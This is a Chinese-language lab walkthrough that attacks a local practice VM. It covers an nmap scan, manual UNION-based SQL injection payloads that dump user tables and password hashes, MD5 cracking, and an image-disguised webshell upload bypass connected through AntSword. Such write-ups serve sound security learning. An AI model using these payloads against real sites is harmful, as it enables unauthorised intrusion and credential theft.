先让kali和靶机都是net模式方便我们去扫
1、查询IP
在kali输入命令nmap c段
扫到了靶机的IP192.168.19.160
再扫一下目录
找到一个uploads目录
2、浏览器访问
访问网站
给我们直接跳转到了一个登录页面,我们看到下面有注册页面,我们注册个号进去看看
3、登录
进来之后,点一下search搜索,看到很多书名
我们随便输入个书名看一下
输入OSINT发现会显示出所对应的书名
这是是个搜索框,我们也去尝试一下sql注入看看有没有效果,在OSINT后输入个单引号看看
发现页面跟随着错误的输入而没有显示了,但是也没有报错,我们尝试看看能不能把它给闭合掉
当我输入OSINT' #的时候页面回复正常了,说明这里确实是存在sql注入,并且单引号是可以闭合的
这里我用手工注入进行爆破,因为我自己要复习一下手工注入,大家可以抓包新建一个txt文件,利用sqlmap -r 指定文档直接爆破
4、手工注入:
判断字段
osint' order by 3#
判断回显点
-1 union select 1,2,3 #
判断数据库名
-1' union select database(),2,3#
判断表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
查users表的字段
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#
查user和pasword
-1' union select group_concat(user,'~',pasword),2,3 from users#
然后把这些密码全部进行md5解密,得到
5、接下里,退出账户,使用superadmin登录,因为superadmin是超级管理员
进来之后我们看到这里可以上传图片,所以可能存在文件上传漏洞,我们尝试上传图片木马
新建一个jpg文件,里面写上我们的一句话木马
6、上传,抓包
抓到包之后,修改文件后缀
7、放行
显示文件已经上传到uploads目录下,我们接下来用蚁剑测试连接